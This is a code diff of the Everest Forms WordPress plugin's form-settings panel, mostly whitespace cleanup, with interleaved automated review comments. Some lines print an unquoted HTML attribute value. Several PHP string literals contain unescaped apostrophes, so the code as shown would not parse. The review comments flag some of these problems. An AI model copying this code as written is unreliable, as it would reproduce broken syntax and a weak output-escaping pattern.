 	 * Outputs the builder content.
 	 */
-	public function output_content()
-	{
-		$settings = isset($this->form_data['settings']) ? $this->form_data['settings'] : array();
+	public function output_content() {
+		$settings = isset( $this->form_data['settings'] ) ? $this->form_data['settings'] : array();

 		// --------------------------------------------------------------------//
 		// General
 		// --------------------------------------------------------------------//
 		echo '<div class="evf-content-section evf-content-general-settings">';
 		echo '<div class="evf-content-section-title">';
-		esc_html_e('General', 'everest-forms');
+		esc_html_e( 'General', 'everest-forms' );
 		echo '</div>';
 		everest_forms_panel_field(
 			'text',
 			'settings',
 			'form_title',
 			$this->form_data,
-			esc_html__('Form Name', 'everest-forms'),
+			esc_html__( 'Form Name', 'everest-forms' ),
 			array(
-				'default' => isset($this->form->post_title) ? $this->form->post_title : '',
-				'tooltip' => esc_html__('Give a name to this form', 'everest-forms'),
+				'default' => isset( $this->form->post_title ) ? $this->form->post_title : '',
+				'tooltip' => esc_html__( 'Give a name to this form', 'everest-forms' ),
 			)
 		);
 		everest_forms_panel_field(
@@ -220,33 +223,29 @@
 			'settings',
 			'form_description',
 			$this->form_data,
-			esc_html__('Form description', 'everest-forms'),
+			esc_html__( 'Form description', 'everest-forms' ),
 			array(
 				'input_class' => 'short',
-				'default'     => isset($this->form->form_description) ? $this->form->form_description : '',
-				'tooltip'     => sprintf(esc_html__('Give the description to this form', 'everest-forms')),
+				'default'     => isset( $this->form->form_description ) ? $this->form->form_description : '',
+				'tooltip'     => sprintf( esc_html__( 'Give the description to this form', 'everest-forms' ) ),
 			)
 		);

-		$this->form_data['settings']['form_tags'] = FormHelper::get_form_tags($this->form_data['id'], 'slug');
+		$this->form_data['settings']['form_tags'] = FormHelper::get_form_tags( $this->form_data['id'], 'slug' );

 		everest_forms_panel_field(
 			'select',
 			'settings',
 			'form_tags',
 			$this->form_data,
-			esc_html__('Tags', 'everest-forms'),
+			esc_html__( 'Tags', 'everest-forms' ),
 			array(
 				'default'     => '',
-				'tooltip'     => esc_html__('Please choose a tags from the list, or type in a new tag if you'd like to add one.', 'everest-forms'),
-				'options'     => array_merge(
-					array(
-						'' => esc_html__('', 'everest-forms'),
-					),
-					FormHelper::get_all_form_tags()
-				),
+				'tooltip'     => esc_html__( 'Please choose a tags from the list, or type in a new tag if you'd like to add one.', 'everest-forms' ),
+				'options'     => FormHelper::get_all_form_tags(),
 				'input_class' => 'form-tags-select2',
 				'multiple'    => true,
+				'placeholder' => esc_html__( 'Select or type tags', 'everest-forms' ),
 			)
 		);

@@ -255,11 +254,11 @@
 			'settings',
 			'form_disable_message',
 			$this->form_data,
-			esc_html__('Form disabled message', 'everest-forms'),
+			esc_html__( 'Form disabled message', 'everest-forms' ),
 			array(
 				'input_class' => 'short',
-				'default'     => isset($this->form->form_disable_message) ? $this->form->form_disable_message : __('This form is disabled.', 'everest-forms'),
-				'tooltip'     => sprintf(esc_html__('Message that shows up if the form is disabled.', 'everest-forms')),
+				'default'     => isset( $this->form->form_disable_message ) ? $this->form->form_disable_message : __( 'This form is disabled.', 'everest-forms' ),
+				'tooltip'     => sprintf( esc_html__( 'Message that shows up if the form is disabled.', 'everest-forms' ) ),
 			)
 		);

@@ -268,13 +267,13 @@
 			'settings',
 			'layout_class',
 			$this->form_data,
-			esc_html__('Layout Design', 'everest-forms'),
+			esc_html__( 'Layout Design', 'everest-forms' ),
 			array(
 				'default' => '0',
-				'tooltip' => esc_html__('Choose design template for the Form', 'everest-forms'),
+				'tooltip' => esc_html__( 'Choose design template for the Form', 'everest-forms' ),
 				'options' => array(
-					'default'    => esc_html__('Default', 'everest-forms'),
-					'layout-two' => esc_html__('Classic Layout', 'everest-forms'),
+					'default'    => esc_html__( 'Default', 'everest-forms' ),
+					'layout-two' => esc_html__( 'Classic Layout', 'everest-forms' ),
 				),
 			)
 		);
@@ -283,26 +282,26 @@
 			'settings',
 			'form_class',
 			$this->form_data,
-			esc_html__('Form Class', 'everest-forms'),
+			esc_html__( 'Form Class', 'everest-forms' ),
 			array(
-				'default' => isset($this->form->form_class) ? $this->form->form_class : '',
+				'default' => isset( $this->form->form_class ) ? $this->form->form_class : '',
 				/* translators: %1$s - general settings docs url */
-				'tooltip' => sprintf(esc_html__('Enter CSS class names for the form wrapper. Multiple class names should be separated with spaces. <a href="%s" target="_blank">Learn More</a>', 'everest-forms'), esc_url('https://docs.everestforms.net/docs/general-settings/#7-toc-title')),
+				'tooltip' => sprintf( esc_html__( 'Enter CSS class names for the form wrapper. Multiple class names should be separated with spaces. <a href="%s" target="_blank">Learn More</a>', 'everest-forms' ), esc_url( 'https://docs.everestforms.net/docs/general-settings/#7-toc-title' ) ),
 			)
 		);

-		do_action('everest_forms_field_required_indicators', $this->form_data, $settings);
+		do_action( 'everest_forms_field_required_indicators', $this->form_data, $settings );

-		echo '<div class="everest-forms-border-container"><h4 class="everest-forms-border-container-title">' . esc_html__('Submit Button', 'everest-forms') . '</h4>';
+		echo '<div class="everest-forms-border-container"><h4 class="everest-forms-border-container-title">' . esc_html__( 'Submit Button', 'everest-forms' ) . '</h4>';
 		everest_forms_panel_field(
 			'text',
 			'settings',
 			'submit_button_text',
 			$this->form_data,
-			esc_html__('Submit button text', 'everest-forms'),
+			esc_html__( 'Submit button text', 'everest-forms' ),
 			array(
-				'default' => isset($settings['submit_button_text']) ? $settings['submit_button_text'] : __('Submit', 'everest-forms'),
-				'tooltip' => esc_html__('Enter desired text for submit button.', 'everest-forms'),
+				'default' => isset( $settings['submit_button_text'] ) ? $settings['submit_button_text'] : __( 'Submit', 'everest-forms' ),
+				'tooltip' => esc_html__( 'Enter desired text for submit button.', 'everest-forms' ),
 			)
 		);
 		everest_forms_panel_field(
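Review bot: the 'Form Class' tooltip passes a string containing `<a href="%s" target="_blank">Learn More</a>` through esc_html__(), which encodes the angle brackets, so the link is emitted as entities unless whatever renders the tooltip decodes it again. If the link is meant to be live, translate with __() and run the result through wp_kses() with an allowlist for `a` (href, target). The translators comment above it also names `%1$s` while the string uses `%s`; align the two so translators see the placeholder they are told about.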
@@ -310,10 +309,10 @@
 			'settings',
 			'submit_button_processing_text',
 			$this->form_data,
-			__('Submit button processing text', 'everest-forms'),
+			__( 'Submit button processing text', 'everest-forms' ),
 			array(
-				'default' => isset($settings['submit_button_processing_text']) ? $settings['submit_button_processing_text'] : __('Processing…', 'everest-forms'),
-				'tooltip' => esc_html__('Enter the submit button text that you would like the button to display while the form submission is processing.', 'everest-forms'),
+				'default' => isset( $settings['submit_button_processing_text'] ) ? $settings['submit_button_processing_text'] : __( 'Processing…', 'everest-forms' ),
+				'tooltip' => esc_html__( 'Enter the submit button text that you would like the button to display while the form submission is processing.', 'everest-forms' ),
 			)
 		);
 		everest_forms_panel_field(
@@ -321,24 +320,25 @@
 			'settings',
 			'submit_button_class',
 			$this->form_data,
-			esc_html__('Submit button class', 'everest-forms'),
+			esc_html__( 'Submit button class', 'everest-forms' ),
 			array(
-				'default' => isset($settings['submit_button_class']) ? $settings['submit_button_class'] : '',
-				'tooltip' => esc_html__('Enter CSS class names for submit button. Multiple class names should be separated with spaces.', 'everest-forms'),
+				'default' => isset( $settings['submit_button_class'] ) ? $settings['submit_button_class'] : '',
+				'tooltip' => esc_html__( 'Enter CSS class names for submit button. Multiple class names should be separated with spaces.', 'everest-forms' ),
 			)
 		);
-		do_action('everest_forms_inline_submit_settings', $this, 'submit', 'connection_1');
+		do_action( 'everest_forms_inline_submit_settings', $this, 'submit', 'connection_1' );
 		echo '</div>';
-		do_action('everest_forms_inline_integrations_settings', $this->form_data, $settings);
+		do_action( 'everest_forms_inline_integrations_settings', $this->form_data, $settings );
+			echo '<div class="everest-forms-border-container"><h4 class="everest-forms-border-container-title">' . esc_html__( 'Advanced', 'everest-forms' ) . '</h4>';
 		everest_forms_panel_field(
 			'toggle',
 			'settings',
 			'ajax_form_submission',
 			$this->form_data,
-			esc_html__('Enable Ajax Form Submission', 'everest-forms'),
+			esc_html__( 'Enable Ajax Form Submission', 'everest-forms' ),
 			array(
-				'default' => isset($settings['ajax_form_submission']) ? $settings['ajax_form_submission'] : 0,
-				'tooltip' => esc_html__('Enables form submission without reloading the page.', 'everest-forms'),
+				'default' => isset( $settings['ajax_form_submission'] ) ? $settings['ajax_form_submission'] : 0,
+				'tooltip' => esc_html__( 'Enables form submission without reloading the page.', 'everest-forms' ),
 			)
 		);
 		everest_forms_panel_field(
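Review bot: the added `echo '<div class="everest-forms-border-container">...` line for the 'Advanced' heading is indented one tab deeper than the statements around it, in a change that otherwise normalises whitespace. It also opens a container whose closing `</div>` is not in this hunk, so the pairing has to be checked against the hunk where the close is added. Fix the indentation and consider keeping the open and close visibly together, as the 'Submit Button' container above does.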
@@ -346,79 +346,80 @@
 			'settings',
 			'disabled_entries',
 			$this->form_data,
-			esc_html__('Disable storing entry information', 'everest-forms'),
+			esc_html__( 'Disable storing entry information', 'everest-forms' ),
 			array(
-				'default' => isset($settings['disabled_entries']) ? $settings['disabled_entries'] : 0,
+				'default' => isset( $settings['disabled_entries'] ) ? $settings['disabled_entries'] : 0,
 				/* translators: %1$s - general settings docs url */
-				'tooltip' => sprintf(esc_html__('Disable storing form entries. <a href="%1$s" target="_blank">Learn More</a>', 'everest-forms'), esc_url('https://docs.everestforms.net/docs/general-settings/#13-toc-title')),
+				'tooltip' => sprintf( esc_html__( 'Disable storing form entries. <a href="%1$s" target="_blank">Learn More</a>', 'everest-forms' ), esc_url( 'https://docs.everestforms.net/docs/general-settings/#13-toc-title' ) ),
 			)
 		);
+		do_action( 'everest_forms_inline_advance_settings', $this );
+		echo '</div>';

-
-		do_action('everest_forms_inline_general_settings', $this);
+		do_action( 'everest_forms_inline_general_settings', $this );

 		echo '</div>';

 		// --------------------------------------------------------------------//
 		// Email
 		// --------------------------------------------------------------------//
-		$form_name = isset($settings['form_title']) ? ' - ' . $settings['form_title'] : '';
-		if (! isset($settings['email']['connection_1'])) {
-			$settings['email']['connection_1']                   = array('connection_name' => __('Admin Notification', 'everest-forms'));
-			$settings['email']['connection_1']['evf_to_email']   = isset($settings['email']['evf_to_email']) ? $settings['email']['evf_to_email'] : '{admin_email}';
-			$settings['email']['connection_1']['evf_from_name']  = isset($settings['email']['evf_from_name']) ? $settings['email']['evf_from_name'] : get_bloginfo('name', 'display');
-			$settings['email']['connection_1']['evf_from_email'] = isset($settings['email']['evf_from_email']) ? $settings['email']['evf_from_email'] : '{admin_email}';
-			$settings['email']['connection_1']['evf_reply_to']   = isset($settings['email']['evf_reply_to']) ? $settings['email']['evf_reply_to'] : '';
+		$form_name = isset( $settings['form_title'] ) ? ' - ' . $settings['form_title'] : '';
+		if ( ! isset( $settings['email']['connection_1'] ) ) {
+			$settings['email']['connection_1']                   = array( 'connection_name' => __( 'Admin Notification', 'everest-forms' ) );
+			$settings['email']['connection_1']['evf_to_email']   = isset( $settings['email']['evf_to_email'] ) ? $settings['email']['evf_to_email'] : '{admin_email}';
+			$settings['email']['connection_1']['evf_from_name']  = isset( $settings['email']['evf_from_name'] ) ? $settings['email']['evf_from_name'] : get_bloginfo( 'name', 'display' );
+			$settings['email']['connection_1']['evf_from_email'] = isset( $settings['email']['evf_from_email'] ) ? $settings['email']['evf_from_email'] : '{admin_email}';
+			$settings['email']['connection_1']['evf_reply_to']   = isset( $settings['email']['evf_reply_to'] ) ? $settings['email']['evf_reply_to'] : '';
 			/* translators: %s: Form Name */
-			$settings['email']['connection_1']['evf_email_subject'] = isset($settings['email']['evf_email_subject']) ? $settings['email']['evf_email_subject'] : sprintf(esc_html__('New Form Entry %s', 'everest-forms'), $form_name);
-			$settings['email']['connection_1']['evf_email_message'] = isset($settings['email']['evf_email_message']) ? $settings['email']['evf_email_message'] : '{all_fields}';
+			$settings['email']['connection_1']['evf_email_subject'] = isset( $settings['email']['evf_email_subject'] ) ? $settings['email']['evf_email_subject'] : sprintf( esc_html__( 'New Form Entry %s', 'everest-forms' ), $form_name );
+			$settings['email']['connection_1']['evf_email_message'] = isset( $settings['email']['evf_email_message'] ) ? $settings['email']['evf_email_message'] : '{all_fields}';

-			$email_settings = array('attach_pdf_to_admin_email', 'show_header_in_attachment_pdf_file', 'conditional_logic_status', 'conditional_option', 'conditionals');
-			foreach ($email_settings as $email_setting) {
-				$settings['email']['connection_1'][$email_setting] = isset($settings['email'][$email_setting]) ? $settings['email'][$email_setting] : '';
+			$email_settings = array( 'attach_pdf_to_admin_email', 'show_header_in_attachment_pdf_file', 'conditional_logic_status', 'conditional_option', 'conditionals' );
+			foreach ( $email_settings as $email_setting ) {
+				$settings['email']['connection_1'][ $email_setting ] = isset( $settings['email'][ $email_setting ] ) ? $settings['email'][ $email_setting ] : '';
 			}

 			// Backward compatibility.
-			$unique_connection_id = sprintf('connection_%s', uniqid());
-			if (isset($settings['email']['evf_send_confirmation_email']) && '1' === $settings['email']['evf_send_confirmation_email']) {
-				$settings['email'][$unique_connection_id] = array('connection_name' => esc_html__('User Notification', 'everest-forms'));
+			$unique_connection_id = sprintf( 'connection_%s', uniqid() );
+			if ( isset( $settings['email']['evf_send_confirmation_email'] ) && '1' === $settings['email']['evf_send_confirmation_email'] ) {
+				$settings['email'][ $unique_connection_id ] = array( 'connection_name' => esc_html__( 'User Notification', 'everest-forms' ) );

-				foreach ($email_settings as $email_setting) {
-					$settings['email'][$unique_connection_id][$email_setting] = isset($settings['email'][$email_setting]) ? $settings['email'][$email_setting] : '';
+				foreach ( $email_settings as $email_setting ) {
+					$settings['email'][ $unique_connection_id ][ $email_setting ] = isset( $settings['email'][ $email_setting ] ) ? $settings['email'][ $email_setting ] : '';
 				}
 			}
 		}

 		echo "<div class = 'evf-email-settings-wrapper'>";

-		foreach ($settings['email'] as $connection_id => $connection) :
-			if (preg_match('/connection_/', $connection_id)) {
+		foreach ( $settings['email'] as $connection_id => $connection ) :
+			if ( preg_match( '/connection_/', $connection_id ) ) {
 				// Backward Compatibility.
-				if (isset($settings['email']['enable_email_notification']) && '0' === $settings['email']['enable_email_notification']) {
-					$email_status = isset($settings['email']['enable_email_notification']) ? $settings['email']['enable_email_notification'] : '1';
+				if ( isset( $settings['email']['enable_email_notification'] ) && '0' === $settings['email']['enable_email_notification'] ) {
+					$email_status = isset( $settings['email']['enable_email_notification'] ) ? $settings['email']['enable_email_notification'] : '1';
 				} else {
-					$email_status = isset($settings['email'][$connection_id]['enable_email_notification']) ? $settings['email'][$connection_id]['enable_email_notification'] : '1';
+					$email_status = isset( $settings['email'][ $connection_id ]['enable_email_notification'] ) ? $settings['email'][ $connection_id ]['enable_email_notification'] : '1';
 				}
 				$hidden_class                = '1' !== $email_status ? 'everest-forms-hidden' : '';
 				$hidden_enable_setting_class = '1' === $email_status ? 'everest-forms-hidden' : '';
-				$toggler_hide_class          = isset($toggler_hide_class) ? 'style=display:none;' : '';
-				echo '<div class="evf-content-section evf-content-email-settings" ' . esc_attr($toggler_hide_class) . '>';
-				echo '<div class="evf-content-section-title" ' . esc_attr($toggler_hide_class) . '>';
-				echo '<div class="evf-title">' . esc_html__('Email', 'everest-forms') . '</div>';
-		?>
-				<div class="evf-enable-email-toggle <?php echo esc_attr($hidden_enable_setting_class); ?>"><img src="<?php echo esc_url(plugin_dir_url(EVF_PLUGIN_FILE) . 'assets/images/enable-email-toggle.png'); ?>" alt="<?php esc_attr_e('Click me to enable email settings', 'everest-forms'); ?>"></div>
+				$toggler_hide_class          = isset( $toggler_hide_class ) ? 'style=display:none;' : '';
+				echo '<div class="evf-content-section evf-content-email-settings" ' . esc_attr( $toggler_hide_class ) . '>';
+				echo '<div class="evf-content-section-title" ' . esc_attr( $toggler_hide_class ) . '>';
+				echo '<div class="evf-title">' . esc_html__( 'Email', 'everest-forms' ) . '</div>';
+				?>
+				<div class="evf-enable-email-toggle <?php echo esc_attr( $hidden_enable_setting_class ); ?>"><img src="<?php echo esc_url( plugin_dir_url( EVF_PLUGIN_FILE ) . 'assets/images/enable-email-toggle.png' ); ?>" alt="<?php esc_attr_e( 'Click me to enable email settings', 'everest-forms' ); ?>"></div>
 				<div class="evf-toggle-section">
 					<label class="evf-toggle-switch">
-						<input type="hidden" name="settings[email][<?php echo esc_attr($connection_id); ?>][enable_email_notification]" value="0" class="widefat">
-						<input type="checkbox" name="settings[email][<?php echo esc_attr($connection_id); ?>][enable_email_notification]" value="1" data-connection-id="<?php echo esc_attr($connection_id); ?>" <?php echo checked('1', $email_status, false); ?>>
+						<input type="hidden" name="settings[email][<?php echo esc_attr( $connection_id ); ?>][enable_email_notification]" value="0" class="widefat">
+						<input type="checkbox" name="settings[email][<?php echo esc_attr( $connection_id ); ?>][enable_email_notification]" value="1" data-connection-id="<?php echo esc_attr( $connection_id ); ?>" <?php echo checked( '1', $email_status, false ); ?>>
 						<span class="evf-toggle-switch-wrap"></span>
 						<span class="evf-toggle-switch-control"></span>
 					</label>
 				</div>
 				</div>
-		<?php
+				<?php

-				echo '<div class="evf-content-email-settings-inner ' . esc_attr($hidden_class) . '" data-connection_id=' . esc_attr($connection_id) . '>';
+				echo '<div class="evf-content-email-settings-inner ' . esc_attr( $hidden_class ) . '" data-connection_id=' . esc_attr( $connection_id ) . '>';

 				everest_forms_panel_field(
 					'text',
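Review bot: near the end of this hunk, `data-connection_id=' . esc_attr( $connection_id ) . '>'` prints an unquoted attribute value. esc_attr() is meant for values placed inside quotes; without them a key containing whitespace ends the attribute and starts a new one. Wrap the value in double quotes. The same applies to `$toggler_hide_class`, where a whole `style=display:none;` attribute is passed through esc_attr() and printed bare. Note also that `preg_match( '/connection_/', $connection_id )` is unanchored and matches any key that merely contains that text, and that the new `everest_forms_inline_advance_settings` hook is added without a docblock or @since tag.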
@@ -427,7 +428,7 @@
 					$this->form_data,
 					'',
 					array(
-						'default'    => isset($settings['email'][$connection_id]['connection_name']) ? $settings['email'][$connection_id]['connection_name'] : __('Admin Notification', 'everest-forms'),
+						'default'    => isset( $settings['email'][ $connection_id ]['connection_name'] ) ? $settings['email'][ $connection_id ]['connection_name'] : __( 'Admin Notification', 'everest-forms' ),
 						'class'      => 'everest-forms-email-name',
 						'parent'     => 'settings',
 						'subsection' => $connection_id,
@@ -439,11 +440,11 @@
 					'email',
 					'evf_to_email',
 					$this->form_data,
-					esc_html__('To Address', 'everest-forms'),
+					esc_html__( 'To Address', 'everest-forms' ),
 					array(
-						'default'    => isset($settings['email'][$connection_id]['evf_to_email']) ? $settings['email'][$connection_id]['evf_to_email'] : '{admin_email}',
+						'default'    => isset( $settings['email'][ $connection_id ]['evf_to_email'] ) ? $settings['email'][ $connection_id ]['evf_to_email'] : '{admin_email}',
 						/* translators: %1$s - general settings docs url */
-						'tooltip'    => sprintf(esc_html__('Enter the recipient's email address (comma separated) to receive form entry notifications. <a href="%s" target="_blank">Learn More</a>', 'everest-forms'), esc_url('https://docs.everestforms.net/docs/email-settings/#1-toc-title')),
+						'tooltip'    => sprintf( esc_html__( 'Enter the recipient's email address (comma separated) to receive form entry notifications. <a href="%s" target="_blank">Learn More</a>', 'everest-forms' ), esc_url( 'https://docs.everestforms.net/docs/email-settings/#1-toc-title' ) ),
 						'smarttags'  => array(
 							'type'        => 'fields',
 							'form_fields' => 'email',
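Review bot: in the 'To Address' tooltip, the apostrophe in `recipient's` appears unescaped inside a single-quoted literal; as shown that terminates the string early, so confirm the source escapes it or uses a double-quoted string. The Cc and Bcc tooltips in the next two hunks show the same pattern. The translators comment says `%1$s` while the string uses `%s`, and the `<a>` markup is again passed through esc_html__(), which encodes it rather than rendering a link.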
@@ -452,16 +453,16 @@
 						'subsection' => $connection_id,
 					)
 				);
-				if ('yes' === get_option('everest_forms_enable_email_copies')) {
+				if ( 'yes' === get_option( 'everest_forms_enable_email_copies' ) ) {
 					everest_forms_panel_field(
 						'text',
 						'email',
 						'evf_carboncopy',
 						$this->form_data,
-						esc_html__('Cc Address', 'everest-forms'),
+						esc_html__( 'Cc Address', 'everest-forms' ),
 						array(
-							'default'    => isset($settings['email'][$connection_id]['evf_carboncopy']) ? $settings['email'][$connection_id]['evf_carboncopy'] : '',
-							'tooltip'    => esc_html__('Enter Cc recipient's email address (comma separated) to receive form entry notifications.', 'everest-forms'),
+							'default'    => isset( $settings['email'][ $connection_id ]['evf_carboncopy'] ) ? $settings['email'][ $connection_id ]['evf_carboncopy'] : '',
+							'tooltip'    => esc_html__( 'Enter Cc recipient's email address (comma separated) to receive form entry notifications.', 'everest-forms' ),
 							'smarttags'  => array(
 								'type'        => 'fields',
 								'form_fields' => 'email',
@@ -475,10 +476,10 @@
 						'email',
 						'evf_blindcarboncopy',
 						$this->form_data,
-						esc_html__('Bcc Address', 'everest-forms'),
+						esc_html__( 'Bcc Address', 'everest-forms' ),
 						array(
-							'default'    => isset($settings['email'][$connection_id]['evf_blindcarboncopy']) ? $settings['email'][$connection_id]['evf_blindcarboncopy'] : '',
-							'tooltip'    => esc_html__('Enter Bcc recipient's email address (comma separated) to receive form entry notifications.', 'everest-forms'),
+							'default'    => isset( $settings['email'][ $connection_id ]['evf_blindcarboncopy'] ) ? $settings['email'][ $connection_id ]['evf_blindcarboncopy'] : '',
+							'tooltip'    => esc_html__( 'Enter Bcc recipient's email address (comma separated) to receive form entry notifications.', 'everest-forms' ),
 							'smarttags'  => array(
 								'type'        => 'fields',
 								'form_fields' => 'email',
@@ -493,11 +494,11 @@
 					'email',
 					'evf_from_name',
 					$this->form_data,
-					esc_html__('From Name', 'everest-forms'),
+					esc_html__( 'From Name', 'everest-forms' ),
 					array(
-						'default'    => isset($settings['email'][$connection_id]['evf_from_name']) ? $settings['email'][$connection_id]['evf_from_name'] : get_bloginfo('name', 'display'),
+						'default'    => isset( $settings['email'][ $connection_id ]['evf_from_name'] ) ? $settings['email'][ $connection_id ]['evf_from_name'] : get_bloginfo( 'name', 'display' ),
 						/* translators: %1$s - general settings docs url */
-						'tooltip'    => sprintf(esc_html__('Enter the From Name to be displayed in Email. <a href="%1$s" target="_blank">Learn More</a>', 'everest-forms'), esc_url('https://docs.everestforms.net/docs/email-settings/#2-toc-title')),
+						'tooltip'    => sprintf( esc_html__( 'Enter the From Name to be displayed in Email. <a href="%1$s" target="_blank">Learn More</a>', 'everest-forms' ), esc_url( 'https://docs.everestforms.net/docs/email-settings/#2-toc-title' ) ),
 						'smarttags'  => array(
 							'type'        => 'all',
 							'form_fields' => 'all',
@@ -511,11 +512,11 @@
 					'email',
 					'evf_from_email',
 					$this->form_data,
-					esc_html__('From Address', 'everest-forms'),
+					esc_html__( 'From Address', 'everest-forms' ),
 					array(
-						'default'    => isset($settings['email'][$connection_id]['evf_from_email']) ? $settings['email'][$connection_id]['evf_from_email'] : '{admin_email}',
+						'default'    => isset( $settings['email'][ $connection_id ]['evf_from_email'] ) ? $settings['email'][ $connection_id ]['evf_from_email'] : '{admin_email}',
 						/* translators: %1$s - general settings docs url */
-						'tooltip'    => sprintf(esc_html__('Enter the Email address from which you want to send Email. <a href="%s" target="_blank">Learn More</a>', 'everest-forms'), esc_url('https://docs.everestforms.net/docs/email-settings/#3-toc-title')),
+						'tooltip'    => sprintf( esc_html__( 'Enter the Email address from which you want to send Email. <a href="%s" target="_blank">Learn More</a>', 'everest-forms' ), esc_url( 'https://docs.everestforms.net/docs/email-settings/#3-toc-title' ) ),
 						'smarttags'  => array(
 							'type'        => 'fields',
 							'form_fields' => 'email',
@@ -529,11 +530,11 @@
 					'email',
 					'evf_reply_to',
 					$this->form_data,
-					esc_html__('Reply To', 'everest-forms'),
+					esc_html__( 'Reply To', 'everest-forms' ),
 					array(
-						'default'    => isset($settings['email'][$connection_id]['evf_reply_to']) ? $settings['email'][$connection_id]['evf_reply_to'] : '',
+						'default'    => isset( $settings['email'][ $connection_id ]['evf_reply_to'] ) ? $settings['email'][ $connection_id ]['evf_reply_to'] : '',
 						/* translators: %1$s - general settings docs url */
-						'tooltip'    => sprintf(esc_html__('Enter the reply to email address where you want the email to be received when this email is replied. <a href="%1$s" target="_blank">Learn More</a>', 'everest-forms'), esc_url('https://docs.everestforms.net/docs/email-settings/#4-toc-title')),
+						'tooltip'    => sprintf( esc_html__( 'Enter the reply to email address where you want the email to be received when this email is replied. <a href="%1$s" target="_blank">Learn More</a>', 'everest-forms' ), esc_url( 'https://docs.everestforms.net/docs/email-settings/#4-toc-title' ) ),
 						'smarttags'  => array(
 							'type'        => 'fields',
 							'form_fields' => 'email',
@@ -547,12 +548,12 @@
 					'email',
 					'evf_email_subject',
 					$this->form_data,
-					esc_html__('Email Subject', 'everest-forms'),
+					esc_html__( 'Email Subject', 'everest-forms' ),
 					array(
 						/* translators: %s: Form Name */
-						'default'    => isset($settings['email'][$connection_id]['evf_email_subject']) ? $settings['email'][$connection_id]['evf_email_subject'] : sprintf(esc_html__('New Form Entry %s', 'everest-forms'), $form_name),
+						'default'    => isset( $settings['email'][ $connection_id ]['evf_email_subject'] ) ? $settings['email'][ $connection_id ]['evf_email_subject'] : sprintf( esc_html__( 'New Form Entry %s', 'everest-forms' ), $form_name ),
 						/* translators: %1$s - General Settings docs url */
-						'tooltip'    => sprintf(esc_html__('Enter the subject of the email. <a href="%1$s" target="_blank">Learn More</a>', 'everest-forms'), esc_url('https://docs.everestforms.net/docs/email-settings/#5-toc-title')),
+						'tooltip'    => sprintf( esc_html__( 'Enter the subject of the email. <a href="%1$s" target="_blank">Learn More</a>', 'everest-forms' ), esc_url( 'https://docs.everestforms.net/docs/email-settings/#5-toc-title' ) ),
 						'smarttags'  => array(
 							'type'        => 'all',
 							'form_fields' => 'all',
@@ -564,19 +565,19 @@
 				// --------------------------------------------------------------------//
 				// Everest Forms AI Setting Section Start
 				// --------------------------------------------------------------------//
-				$everest_forms_ai_api_key = get_option('everest_forms_ai_api_key');
-				if (! empty($everest_forms_ai_api_key)) {
+				$everest_forms_ai_api_key = get_option( 'everest_forms_ai_api_key' );
+				if ( ! empty( $everest_forms_ai_api_key ) ) {
 					everest_forms_panel_field(
 						'toggle',
 						'email',
 						'enable_ai_email_prompt',
 						$this->form_data,
-						esc_html__('Enable Email Prompt', 'everest-forms'),
+						esc_html__( 'Enable Email Prompt', 'everest-forms' ),
 						array(
-							'default'    => ! empty($settings['email'][$connection_id]['enable_ai_email_prompt']) ? $settings['email'][$connection_id]['enable_ai_email_prompt'] : '0',
+							'default'    => ! empty( $settings['email'][ $connection_id ]['enable_ai_email_prompt'] ) ? $settings['email'][ $connection_id ]['enable_ai_email_prompt'] : '0',
 							'class'      => 'everest-forms-enable-email-prompt',
 							/* translators: %1$s - email message prompt doc url*/
-							'tooltip'    => sprintf(esc_html__('Check this option to enable the email message prompt. <a href="%s" target="_blank">Learn More</a>', 'everest-forms'), esc_url('https://docs.everestforms.net/docs/ai/#6-toc-title')),
+							'tooltip'    => sprintf( esc_html__( 'Check this option to enable the email message prompt. <a href="%s" target="_blank">Learn More</a>', 'everest-forms' ), esc_url( 'https://docs.everestforms.net/docs/ai/#6-toc-title' ) ),
 							'parent'     => 'settings',
 							'subsection' => $connection_id,
 						)
@@ -586,12 +587,12 @@
 						'email',
 						'evf_email_message_prompt',
 						$this->form_data,
-						esc_html__('Email Message Prompt', 'everest-forms'),
+						esc_html__( 'Email Message Prompt', 'everest-forms' ),
 						array(
-							'default'    => isset($settings['email'][$connection_id]['evf_email_message_prompt']) ? $settings['email'][$connection_id]['evf_email_message_prompt'] : '',
-							'class'      => isset($settings['email'][$connection_id]['enable_ai_email_prompt']) && '1' === $settings['email'][$connection_id]['enable_ai_email_prompt'] ? 'evf-email-message-prompt' : 'evf-email-message-prompt everest-forms-hidden',
+							'default'    => isset( $settings['email'][ $connection_id ]['evf_email_message_prompt'] ) ? $settings['email'][ $connection_id ]['evf_email_message_prompt'] : '',
+							'class'      => isset( $settings['email'][ $connection_id ]['enable_ai_email_prompt'] ) && '1' === $settings['email'][ $connection_id ]['enable_ai_email_prompt'] ? 'evf-email-message-prompt' : 'evf-email-message-prompt everest-forms-hidden',
 							/* translators: %1$s - general settings docs url */
-							'tooltip'    => sprintf(esc_html__('Enter the email message prompt. <a href="%1$s" target="_blank">Learn More</a>', 'everest-forms'), esc_url('https://docs.everestforms.net/docs/ai/#6-toc-title')),
+							'tooltip'    => sprintf( esc_html__( 'Enter the email message prompt. <a href="%1$s" target="_blank">Learn More</a>', 'everest-forms' ), esc_url( 'https://docs.everestforms.net/docs/ai/#6-toc-title' ) ),
 							'smarttags'  => array(
 								'type'        => 'all',
 								'form_fields' => 'all',
@@ -609,11 +610,11 @@
 					'email',
 					'evf_email_message',
 					$this->form_data,
-					esc_html__('Email Message', 'everest-forms'),
+					esc_html__( 'Email Message', 'everest-forms' ),
 					array(
-						'default'    => isset($settings['email'][$connection_id]['evf_email_message']) ? evf_string_translation($this->form_data['id'], 'evf_email_message', $settings['email'][$connection_id]['evf_email_message']) : __('{all_fields}', 'everest-forms'),
+						'default'    => isset( $settings['email'][ $connection_id ]['evf_email_message'] ) ? evf_string_translation( $this->form_data['id'], 'evf_email_message', $settings['email'][ $connection_id ]['evf_email_message'] ) : __( '{all_fields}', 'everest-forms' ),
 						/* translators: %1$s - general settings docs url */
-						'tooltip'    => sprintf(esc_html__('Enter the message of the email. <a href="%1$s" target="_blank">Learn More</a>', 'everest-forms'), esc_url('https://docs.everestforms.net/docs/email-settings/#6-toc-title')),
+						'tooltip'    => sprintf( esc_html__( 'Enter the message of the email. <a href="%1$s" target="_blank">Learn More</a>', 'everest-forms' ), esc_url( 'https://docs.everestforms.net/docs/email-settings/#6-toc-title' ) ),
 						'smarttags'  => array(
 							'type'        => 'all',
 							'form_fields' => 'all',
@@ -621,11 +622,11 @@
 						'parent'     => 'settings',
 						'subsection' => $connection_id,
 						/* translators: %s - all fields smart tag. */
